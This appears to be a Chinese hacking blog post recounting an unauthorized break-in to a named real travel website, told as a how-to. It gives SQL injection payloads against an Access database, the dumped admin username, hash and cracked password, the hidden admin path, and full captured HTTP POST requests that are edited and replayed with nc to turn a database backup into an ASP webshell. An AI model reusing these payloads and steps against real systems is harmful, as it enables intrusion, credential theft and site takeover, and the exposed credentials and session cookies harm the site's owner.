這是我之前在綠色兵團(tuán)時(shí)寫的一篇文章，是我自己原創(chuàng)的，思路借鑒了一篇t00ls里的，進(jìn)行了改進(jìn)。我在綠色兵團(tuán)的賬號(hào)名字也是leisureforest
真實(shí)性毋庸置疑，希望給過。thanks
數(shù)據(jù)庫抓包另類備份
地址http://www.dbjr.com.cn/(僅用于替代目標(biāo)網(wǎng)站，非本站)
數(shù)據(jù)庫抓包另類備份
又是旅游網(wǎng)。我剛才發(fā)了一篇文章，正想走，外面下雨了。實(shí)在是閑的難受。再寫這個(gè)，提提我人氣。
數(shù)據(jù)庫抓包另類備份
這個(gè)地址是一個(gè)家伙發(fā)給我的，他說讓我試一試，我隨便找了個(gè)鏈接http://www.kmholiday.com/Travel/Travel_line_view.asp?lineid=1030’加了個(gè)特殊字符，馬上返回錯(cuò)誤信息
數(shù)據(jù)庫抓包另類備份
Microsoft JET Database Engine
數(shù)據(jù)庫抓包另類備份
錯(cuò)誤'80040e14'
語法錯(cuò)誤(操作符丟失) 在查詢表達(dá)式'id=1030‘' 中。
數(shù)據(jù)庫抓包另類備份
/Travel/Travel_line_view.asp，行 41
數(shù)據(jù)庫抓包另類備份
數(shù)據(jù)庫抓包另類備份
什么意思嘛。這不明擺著讓我搞他。access的數(shù)據(jù)庫，直接上語句，and exists(select * from msysobjects)
數(shù)據(jù)庫抓包另類備份
數(shù)據(jù)庫抓包另類備份
Microsoft JET Database Engine
數(shù)據(jù)庫抓包另類備份
錯(cuò)誤'80040e09'
數(shù)據(jù)庫抓包另類備份
不能讀取記錄；在'msysobjects' 上沒有讀取數(shù)據(jù)權(quán)限。
數(shù)據(jù)庫抓包另類備份
/Travel/Travel_line_view.asp，行41
數(shù)據(jù)庫抓包另類備份
有這個(gè)表但是不能訪問。好的 接著執(zhí)行and exists(select * from admin) 正常頁面 ；有admin表---- 帥
數(shù)據(jù)庫抓包另類備份
and exists(select count(user) from admin)還是正常頁面有user字段
數(shù)據(jù)庫抓包另類備份
and exists(select count(psw from admin) 正常頁面，密碼字段。
數(shù)據(jù)庫抓包另類備份
用戶名aidy 密碼28B9E7A5FADBDB964E9069BC82AC2AF9 32位加密的，嚇?biāo)牢伊恕ＨD5搞了下，汗19850311 奶奶的，真唬人。這時(shí)我就給那人發(fā)信息了，這個(gè)也太簡(jiǎn)單了吧，還高什么，他說，拿到shell才算。好吧接著搞。
數(shù)據(jù)庫抓包另類備份
找后臺(tái)，這個(gè)可真難住我了。先上工具，掃了四萬多條愣是沒找到。其實(shí)這種情況他肯定有個(gè)目錄很難差，根本不好搞，怎么辦，還是google ，用了好幾個(gè)語句，只找到倆登陸頁面但是都不對(duì)。還是回到首頁看圖片，但是右鍵不能使用，不讓查看屬性。最后下載的時(shí)候從迅雷里看的地址。我真有辦法哈哈……
數(shù)據(jù)庫抓包另類備份
找到這個(gè)頁面了http://www.kmholiday.com/adminsheeninfo/直接跳轉(zhuǎn)登陸。
數(shù)據(jù)庫抓包另類備份
進(jìn)去之后發(fā)現(xiàn)有數(shù)據(jù)庫備份。先找了個(gè)上傳，上傳了個(gè)圖片木馬正當(dāng)我興致勃勃地來備份的時(shí)候，出問題了，原來備份路徑不能修改。也就是說你備份只能備份mdb數(shù)據(jù)庫文件，備份之后的文件名為asa,這個(gè)倒是沒問題，iis可以解析，關(guān)鍵是路徑不讓動(dòng)，這可難死我了，怎么辦呢。還是右鍵查看源碼吧。找到了這個(gè)鏈接
數(shù)據(jù)庫抓包另類備份
http://www.dbjr.com.cn/ adminsheeninfo/Oledit/ewebeditor/汗，又是編輯器，編輯器啊編輯器，又是你，都不想搞了，進(jìn)入編輯器，登陸頁面也沒有刪除。現(xiàn)在我寫文章的時(shí)候被刪了，我知道是誰刪的（不是我），不截圖了。進(jìn)去還是那個(gè)用戶名密碼。找到樣式管理，原來的樣式保存按鈕被刪除了，他以為這樣就安全了。那么我copy了一個(gè)樣式，在新創(chuàng)建的樣式里，添加了asp格式。asa.但是都沒有成功，其實(shí)如果在這里添加aaspsp就可以了，但是我沒想到他有這么蠢的漏洞，我就沒這么搞。難道我會(huì)拿不到shell。不可能。
數(shù)據(jù)庫抓包另類備份
于是我苦思冥想，終于想到了一句話木馬。后來一看人家兩年前就有人想到這個(gè)方法了，就是在添加新聞那里插入一個(gè)新聞抓下包，然后改新聞內(nèi)容為自己的一句話nc提交、如下圖
數(shù)據(jù)庫抓包另類備份
抓包內(nèi)容如下
數(shù)據(jù)庫抓包另類備份
POST /adminsheeninfo/Oledit/Upload.asp?action=remote&type=remote&style=s_light HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/QVOD, application/QVOD, */*
Referer: http://www.kmholiday.com/adminsh ... s&style=s_light
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.kmholiday.com
Content-Length: 33
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: cck_lasttime=1312255680031; cck_count=0; ASPSESSIONIDSQQSDTTT=PNFACNHDBNBMAFNBNHHHBFCP
數(shù)據(jù)庫抓包另類備份
eWebEditor_UploadText=ggggggggggg看到最后這里沒有只抓到了內(nèi)容沒抓到路徑，也就是說沒法訪問一句話，白玩了。
數(shù)據(jù)庫抓包另類備份
看來這個(gè)還真不好搞。這時(shí)我想還是得用那個(gè)后臺(tái)的備份，其實(shí)既然這里可以抓包后臺(tái)那里也可以抓包的，說干就干。
數(shù)據(jù)庫抓包另類備份
我點(diǎn)擊后臺(tái)數(shù)據(jù)庫備份，抓到的內(nèi)容如下
數(shù)據(jù)庫抓包另類備份
POST /adminsheeninfo/DB_Manage.asp?action=BackupData&act=Backup HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/QVOD, application/QVOD, */*
Referer: http://www.kmholiday.com/adminsh ... p?action=BackupData
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.kmholiday.com
Content-Length: 162
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: cck_lasttime=1312255680031; cck_count=0; ASPSESSIONIDSQQSDTTT=PNFACNHDBNBMAFNBNHHHBFCP
數(shù)據(jù)庫抓包另類備份
DBpath=%2Fadminsheeninfo%2Fdb%2Fweb_date_%23_sheenzhaoghsy%26%23@%21.mdb&bkfolder=..%2F..%2Fdatabase%2FDataBackup%2F&bkDBname=DB_BAK_20110802_1201247.asa&bknotes=
數(shù)據(jù)庫抓包另類備份
大家看到最后這個(gè)鏈接沒有，這個(gè)事什么意思呢，分析下先。DBpath=%2Fadminsheeninfo%2Fdb%2Fweb_date_%23_sheenzhaoghsy%26%23@%21.mdb這個(gè)是原來的數(shù)據(jù)庫名稱，%23是空格，%2f是/的編碼，轉(zhuǎn)換之后就是/adminsheeninfo/db/web_date_#_sheenzhaoghsy&#@!.mdb備份后的數(shù)據(jù)庫名稱就是=..%2F..%2Fdatabase%2FDataBackup%2F&bkDBname我們要修改原來的數(shù)據(jù)庫名稱為自己上傳的圖片馬，隨便一個(gè)吧，比如2011-8-2 12:07:04.jpg,我隨便寫的，吧原數(shù)據(jù)庫路徑改成這個(gè)，然后數(shù)出來原來的數(shù)據(jù)庫路徑的字符長度，比如是162（假設(shè)）我不數(shù)了，我記得當(dāng)時(shí)數(shù)的是153，圖片是64，然后用153-64=89那么就把原來的Content-Length: 162修改為89，然后用保存為qq.txt，文件名隨便起。保存為txt文檔。復(fù)制到c盤根目錄下面
數(shù)據(jù)庫抓包另類備份
用nc上傳(nc也要放到c盤根目錄)
數(shù)據(jù)庫抓包另類備份
命令nc www.kmholiday.com 80<qq.txt。上傳之后就會(huì)返回上傳成功的提示。如下
數(shù)據(jù)庫抓包另類備份
%2Fadminsheeninfo%2FOledit%2FUploadFile%2F2011730232015138.jpg 62
已經(jīng)成功備份,你的數(shù)據(jù)庫的路徑:\hosting\wwwroot\kmholiday_cn\htdocs\adminsh eeninfo\../../database/DataBackup/\DB_BAK_20110730_231235.asa返回...
database/DataBackup/\DB_BAK_20110730_231235.asa
數(shù)據(jù)庫抓包另類備份
這個(gè)就是備份之后的Asp馬地址D:\hosting\wwwroot\kmholiday_cn\htdocs\adminsh eeninfo\../../database/DataBackup/\DB_BAK_20110730_231235.asa用俠客客服端連接一下就可以了，然后上傳自己的asp MM，訪問，我沒再截圖，這樣不好你懂的。
數(shù)據(jù)庫抓包另類備份
好啦，看來看似簡(jiǎn)單的東西并不是那么容易得到，切莫眼高收低，像我一樣，踏踏實(shí)實(shí)做事還是好些。
數(shù)據(jù)庫抓包另類備份

最新評(píng)論